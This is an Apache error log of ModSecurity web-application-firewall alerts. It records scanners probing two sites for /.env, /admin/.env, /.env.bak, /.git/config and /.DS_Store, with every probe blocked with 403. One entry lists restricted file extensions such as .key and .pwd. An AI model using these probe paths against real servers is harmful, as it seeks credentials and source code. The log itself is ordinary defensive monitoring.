[Mon Dec 01 14:39:11.442564 2025] [:error] [pid 441954] [client 165.22.34.189:36490] [client 165.22.34.189] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aS2af3ijrbz5Mx7E72Y8ZAAAAAQ"]
[Mon Dec 01 14:39:11.442805 2025] [:error] [pid 441954] [client 165.22.34.189:36490] [client 165.22.34.189] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aS2af3ijrbz5Mx7E72Y8ZAAAAAQ"]
[Mon Dec 01 14:39:11.443023 2025] [:error] [pid 441954] [client 165.22.34.189:36490] [client 165.22.34.189] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aS2af3ijrbz5Mx7E72Y8ZAAAAAQ"]
[Mon Dec 01 21:05:33.423903 2025] [:error] [pid 441951] [client 35.224.10.236:36656] [client 35.224.10.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS31DVFhrfBY1B-p2jDaWAAAAAE"]
[Mon Dec 01 21:05:33.424150 2025] [:error] [pid 441951] [client 35.224.10.236:36656] [client 35.224.10.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS31DVFhrfBY1B-p2jDaWAAAAAE"]
[Mon Dec 01 21:05:33.424338 2025] [:error] [pid 441951] [client 35.224.10.236:36656] [client 35.224.10.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS31DVFhrfBY1B-p2jDaWAAAAAE"]
[Mon Dec 01 21:08:00.528359 2025] [:error] [pid 442301] [client 34.9.16.66:36584] [client 34.9.16.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS31oINXRa7MULZBF9JOJwAAAAY"]
[Mon Dec 01 21:08:00.528624 2025] [:error] [pid 442301] [client 34.9.16.66:36584] [client 34.9.16.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS31oINXRa7MULZBF9JOJwAAAAY"]
[Mon Dec 01 21:08:00.528798 2025] [:error] [pid 442301] [client 34.9.16.66:36584] [client 34.9.16.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS31oINXRa7MULZBF9JOJwAAAAY"]
[Tue Dec 02 05:30:53.922183 2025] [authz_core:error] [pid 464905] [client 64.227.70.2:56586] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Dec 02 05:30:56.914430 2025] [:error] [pid 464250] [client 64.227.70.2:56644] [client 64.227.70.2] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aS5rgEv9iPkdWxTCCaA72gAAAAE"]
[Tue Dec 02 05:30:56.914700 2025] [:error] [pid 464250] [client 64.227.70.2:56644] [client 64.227.70.2] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aS5rgEv9iPkdWxTCCaA72gAAAAE"]
[Tue Dec 02 05:30:56.914894 2025] [:error] [pid 464250] [client 64.227.70.2:56644] [client 64.227.70.2] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aS5rgEv9iPkdWxTCCaA72gAAAAE"]
[Tue Dec 02 05:30:57.926249 2025] [:error] [pid 464904] [client 64.227.70.2:56672] [client 64.227.70.2] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aS5rgf1sLLIs2FP7Ov7OTwAAAAc"]
[Tue Dec 02 05:30:57.926629 2025] [:error] [pid 464904] [client 64.227.70.2:56672] [client 64.227.70.2] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aS5rgf1sLLIs2FP7Ov7OTwAAAAc"]
[Tue Dec 02 05:30:57.926894 2025] [:error] [pid 464904] [client 64.227.70.2:56672] [client 64.227.70.2] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aS5rgf1sLLIs2FP7Ov7OTwAAAAc"]
[Tue Dec 02 05:30:59.921316 2025] [:error] [pid 464251] [client 64.227.70.2:56700] [client 64.227.70.2] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aS5rg1eGvt2ZFTja4GwI7AAAAAI"]
[Tue Dec 02 05:30:59.921564 2025] [:error] [pid 464251] [client 64.227.70.2:56700] [client 64.227.70.2] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aS5rg1eGvt2ZFTja4GwI7AAAAAI"]
[Tue Dec 02 05:30:59.921737 2025] [:error] [pid 464251] [client 64.227.70.2:56700] [client 64.227.70.2] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aS5rg1eGvt2ZFTja4GwI7AAAAAI"]
[Tue Dec 02 07:17:57.859635 2025] [:error] [pid 464910] [client 139.59.224.88:41110] [client 139.59.224.88] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS6ElQmN2tdAmSYzW_OD3gAAAA0"]
[Tue Dec 02 07:17:57.859949 2025] [:error] [pid 464910] [client 139.59.224.88:41110] [client 139.59.224.88] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS6ElQmN2tdAmSYzW_OD3gAAAA0"]
[Tue Dec 02 07:17:57.860150 2025] [:error] [pid 464910] [client 139.59.224.88:41110] [client 139.59.224.88] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aS6ElQmN2tdAmSYzW_OD3gAAAA0"]
[Tue Dec 02 08:05:28.657324 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aS6PuJ0fE9xfoNXam56O2QAAAAU"]
[Tue Dec 02 08:05:28.657601 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aS6PuJ0fE9xfoNXam56O2QAAAAU"]
[Tue Dec 02 08:05:28.657797 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aS6PuJ0fE9xfoNXam56O2QAAAAU"]
[Tue Dec 02 08:05:28.991408 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aS6PuJ0fE9xfoNXam56O2gAAAAU"]
[Tue Dec 02 08:05:28.991691 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aS6PuJ0fE9xfoNXam56O2gAAAAU"]
[Tue Dec 02 08:05:28.991947 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aS6PuJ0fE9xfoNXam56O2gAAAAU"]
[Tue Dec 02 08:05:29.476731 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aS6PuZ0fE9xfoNXam56O2wAAAAU"]
[Tue Dec 02 08:05:29.476983 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aS6PuZ0fE9xfoNXam56O2wAAAAU"]
[Tue Dec 02 08:05:29.477182 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aS6PuZ0fE9xfoNXam56O2wAAAAU"]
[Tue Dec 02 08:05:29.841636 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aS6PuZ0fE9xfoNXam56O3AAAAAU"]
[Tue Dec 02 08:05:29.841890 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aS6PuZ0fE9xfoNXam56O3AAAAAU"]
[Tue Dec 02 08:05:29.842099 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aS6PuZ0fE9xfoNXam56O3AAAAAU"]
[Tue Dec 02 08:05:30.351496 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aS6Pup0fE9xfoNXam56O3QAAAAU"]
[Tue Dec 02 08:05:30.351871 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aS6Pup0fE9xfoNXam56O3QAAAAU"]
[Tue Dec 02 08:05:30.352143 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aS6Pup0fE9xfoNXam56O3QAAAAU"]
[Tue Dec 02 08:05:30.718965 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aS6Pup0fE9xfoNXam56O3gAAAAU"]
[Tue Dec 02 08:05:30.719145 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aS6Pup0fE9xfoNXam56O3gAAAAU"]
[Tue Dec 02 08:05:30.719379 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aS6Pup0fE9xfoNXam56O3gAAAAU"]
[Tue Dec 02 08:05:30.719589 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aS6Pup0fE9xfoNXam56O3gAAAAU"]
